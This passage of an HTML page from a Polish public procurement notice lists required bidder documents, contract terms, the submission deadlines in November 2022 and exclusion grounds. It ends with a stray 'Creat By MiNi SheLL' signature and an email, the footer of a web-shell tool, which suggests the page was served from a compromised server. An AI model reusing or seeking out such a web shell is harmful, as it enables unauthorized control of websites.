zamówienie (Wykonawców, o których mowa w art. 58 ustawy PZP)<br/>3.	Od Wykonawcy oferty najkorzystniejszej (najwyżej ocenionej) wymagane będą do złożenia, <br/>na odrębne wezwanie Zamawiającego w wyznaczonym przez Zamawiającego terminie (ustalonym stosownie do art. 274 ust. 1 ustawy PZP, nie krótszym jednak niż 5 dni), następujące oświadczenia i dokumenty, aktualne na dzień ich złożenia, potwierdzające spełnienie określonych w sekcji V.5.4.) ust. 1 oraz ust. 2 ogłoszenia warunków udziału w niniejszym postępowaniu: <br/>1)	Koncesji, o której mowa w sekcji V.5.4.) ust. 1 niniejszego ogłoszenia – na potwierdzenie spełniania wymogu tam określonego<br/>2)	Wykaz (zwany dalej WYKAZEM) ze wskazaniem dwóch USŁUG wymaganych <br/>na podstawie postanowień sekcji V.5.4.) ust. 3 niniejszego ogłoszenia, z podaniem (w odniesieniu do każdej z dwóch USŁUG) jej rodzaju, wartości, miejsca wykonania (wykonywania – w przypadku, gdy USŁUGA jest nadal wykonywana), podmiotu/podmiotów, na rzecz których każda z tych USŁUG została wykonana (jest wykonywana – w przypadku USŁUGI nadal wykonywanej), a także daty wykonania (ukończenia) USŁUGI (przy czym informacja o dacie wykonania tylko wtedy, jeżeli przedstawiana w WYKAZIE USŁUGA jest ukończona). Wyżej wskazane informacje WYKAZIE będą wymagały podania w takim zakresie, aby pozwalała <br/>to Zamawiającemu potwierdzić, że USŁUGA spełnienia wymogi opisane w ust. 3 w sekcji V.5.4.) niniejszego ogłoszenia, z wyjątkiem informacji o należytym wykonaniu USŁUG (czy ich należytym wykonywaniu - w przypadku tych USŁUG, których wykonanie trwa), które to informacje podlegają wykazaniu w sposób wskazany w pkt 3) poniżej. Jeżeli Wykonawca wykazujący spełnienie określonego w ust. 3 w sekcji V.5.4.) niniejszego ogłoszenia warunku udziału w niniejszym postępowaniu powołuje się na doświadczenie w realizacji USŁUG wykonywanych wspólnie z innymi Wykonawcami WYKAZ może dotyczyć USŁUG, w których wykonaniu Wykonawca wykazujący spełnienie warunku bezpośrednio uczestniczył;<br/>3)	Dowody określające, że wymagane USŁUGI z WYKAZU spełniają wymóg określony <br/>w sekcji V.5.4.) ust. 3 pkt 5) niniejszego ogłoszenia. Takimi dowodami są referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, z zastrzeżeniem pkt 4) poniżej. W przypadku USŁUGI/USŁUG nadal wykonywanych - dowód ich należytego wykonywania jak wyżej musi być wystawiony w okresie ostatnich <br/>3 miesięcy;<br/>4)	Zamiast wskazanych w pkt 3) powyżej dokumentów potwierdzających należyte wykonanie/wykonywanie USŁUGI/USŁUG, wystawionych przez podmiot/podmioty, na rzecz których usługi te były wykonane – Wykonawca może przedstawić również inne odpowiednie dokumenty, przy czym tyko wtedy, jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o których mowa w pkt 3) powyżej. Obowiązek wykazania Zamawiającemu istnienia wyżej wskazanej przyczyny stanowiącej przeszkodę w złożeniu dokumentu lub dokumentów wymaganych na podstawie wyżej wskazanego pkt 3) powyżej, należy do Wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Poza samą ofertą, a także dokumentami, o których mowa w sekcji V.5.6 i sekcji V.5.7) ogłoszenia, w postępowaniu wymagane będzie przedłożenie:<br/>1)	Oświadczenia Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy PZP (a w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie takie każdego z nich). W przypadku, gdy wykazanie spełnienia określonego <br/>w sekcji V.5.4.) ust. 3 ogłoszenia warunku udziału w niniejszym postępowaniu następuje zasobami PODMIOTU TRZECIEGO - wskazane oświadczenie winien w tym zakresie złożyć również taki PODMIOT TRZECI; <br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego (KRS), Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej (CEIDG) lub innego właściwego rejestru (w celu potwierdzenia, że osoba/osoby działające w imieniu Wykonawcy są uprawnione <br/>do reprezentowania Wykonawcy przy składaniu oferty, jak też oświadczeń i dokumentów wymaganych na podstawie działu IX SWZ) – przy czym Wykonawca nie jest zobowiązany do złożenia takich dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca wskazał Zamawiającemu dane umożliwiające dostęp do tych dokumentów. W przypadku Wykonawców wpisanych do wyżej wskazanego KRS lub CEiIDG Zamawiający uzna, że ma miejsce ww. wskazanie mu danych umożliwiających dostęp do odpowiednio KRS czy CEiIDG w szczególności w sytuacji, kiedy Wykonawca poda w ofercie lub składanym oświadczeniu, o którym mowa w pkt. 1) powyżej swój nr NIP, REGON lub KRS (przynajmniej jeden z tych numerów).<br/>3)	Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie <br/>do reprezentowania Wykonawcy – przy czym tylko w przypadku i w zakresie, <br/>w jakim w imieniu Wykonawcy działa osoba/osoby, których umocowanie <br/>do reprezentowania Wykonawca nie wynika Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru<br/>4)	Pełnomocnictwa do reprezentowania Wykonawców wspólnie występujących <br/>w niniejszym postępowaniu albo do reprezentowania w tym postepowaniu oraz zawarcia umowy w sprawie zamówienia publicznego – przy czym w tylko w przypadku oferty wspólnej składanej przez Wykonawców wspólnie ubiegających się o zamówienie <br/>5)	Tłumaczenie składanych oświadczeń i dokumentów na język polski – przy czym tylko <br/>w przypadku w zakresie, jakim dane oświadczenie/dokument jest składany w języku obcym<br/>Niezależnie od dokumentów powyższych w sytuacjach niżej wskazanych w niniejszej sekcji wymagane będzie przedłożenie dokumentów jak niżej:<br/>a)	W przypadku, gdy Wykonawca będzie wykazywał spełnienie określonego w sekcji V.5.4.) ust. 3 niniejszego ogłoszenia warunku udziału w niniejszym postępowaniu zdolnościami POMIOTU TRZECIEGO (stosownie do możliwości przewidzianych w tym zakresie zapisami ust. 5 w sekcji V.5.4.) niniejszego ogłoszenia wymagane będzie również złożenie wskazanych w pkt 2) – 3) powyżej dokumentów potwierdzających umocowanie do działania w imieniu PODMIOTU TRZECIEGO przy składaniu wymaganych od niego oświadczeń i dokumentów. Postanowienia pkt 2) – 3) powyżej będą w takim przypadku stosowane odpowiednio, w szczególności wskazane tam wyjątki od obowiązku przedkładania dokumentów potwierdzających umocowanie do działania będą miały zastosowanie również do PODMIOTU TRZECIEGO.<br/>b)	Stosownie do art. 58 ust. 1 ustawy PZP, Wykonawcy wspólnie ubiegający się o zamówienie (składający Ofertę wspólną) ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania w niniejszym postępowaniu i zawarcia Umowy o zamówienie. W takim przypadku, postanowienie pkt 4) powyżej będzie również stosowane odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o zamówienie, o których mowa w art. 58 ustawy PZP <br/>(w przypadku złożenia Oferty wspólnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Stosownie do art. 58 ust. 2 ustawy PZP, Wykonawcy wspólnie ubiegający się o zamówienie (składający Ofertę wspólną) ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania w niniejszym postępowaniu i zawarcia Umowy o zamówienie. Inne wymagania związane z faktem złożenia oferty wspólnej (Wykonawców wspólnie ubiegających się o zamówienie) podane są w sekcjach V.5.4), V.5.7) oraz V.5.11 ogłoszenia (i ich odpowiednikach w tym zakresie w SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia podają postanowienia § 19 – 19h Wzoru Umowy (Klauzule zmiany Umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-21 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego na miniPortal pod adresem internetowym: https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-21 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wskazany w sekcji IV.4.3.2 ogłoszenia sposób określenia wagi kryteriów oceny ofert (procentowo) podlega w SWZ przeliczeniu na punkty według zasady: jeden procent (%) = jeden punkt wagowy. Ilekroć w niniejszym ogłoszeniu używany jest zwrot: 1) ustawa PZP - należy przez to rozumieć obowiązującą polska ustawę z dnia 11 września 2019 r. - Prawo zamówień publicznych, 2) SWZ - należy przez to rozumieć obowiązującą w niniejszym postępowaniu specyfikację warunków zamówienia, o której mowa w art. 281 ustawy PZP, właściwą dla trybu podstawowego bez negocjacji, przyjętego w niniejszym postępowaniu; 3) Wzór Umowy – należy przez to rozumieć wzór umowy w sprawie niniejszego zamówienia, którego treść zawiera załącznik nr 5 SWZ.<br/><br/>O udzielenie niniejszego zamówienia nie mogą ubiegać się Wykonawcy, którzy podlegają wykluczeniu <br/>z postępowania o udzielenie zamówienia na podstawie (z przyczyn wskazanych w) art 108 ust. 1 ustawy PZP, jak tez Wykonawcy, którzy podlegają wykluczeniu z udziału w postępowaniu <br/>o zamówienie na podstawie (z przyczyn wskazanych w) art. 7 ust. 1 ustawy z dnia 13.04.2022 r. <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę <br/>oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2022 poz. 835)<br/><br/>Termin początkowy wskazanego w sekcji IV.4.2.10) ogłoszenia terminu wykonywania zamówienia podają postanowienia § 3 Wzoru Umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com